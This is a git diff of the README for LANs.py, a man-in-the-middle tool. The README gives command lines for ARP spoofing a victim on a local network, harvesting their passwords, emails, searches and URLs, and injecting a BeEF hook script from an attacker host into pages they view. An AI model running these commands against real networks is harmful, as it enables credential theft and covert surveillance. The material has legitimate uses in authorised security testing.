diff --git a/README.md b/README.md index b01b4fa..8cf7db1 100644 --- a/README.md +++ b/README.md @@ -22,29 +22,27 @@ python LANs.py [-a] [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMM Usage ----- -### Simplest usage (including active user targeting): +### Common usage: ``` shell -python LANs.py +python LANs.py -u -p ``` +Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof. -Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing. -### Passive harvesting: +Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png + +Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer. + +### Another common usage: ``` shell -python LANs.py -u -d -p -ip 192.168.0.10 +python LANs.py -u -p -d -ip 192.168.0.10 ``` --u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting - -d: open an xterm with driftnet to see all images they view --p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received; will also decode base64 if the email authentication is encrypted with it - --ip: target this IP address - -Easy to remember and will probably be the most common usage of the script: options u, d, p, like udp/tcp. +-ip: target this IP address and skip the active targeting at the beginning ### HTML injection: @@ -53,14 +51,14 @@ Easy to remember and will probably be the most common usage of the script: optio python LANs.py -b http://192.168.0.5:3000/hook.js ``` -Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. +Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in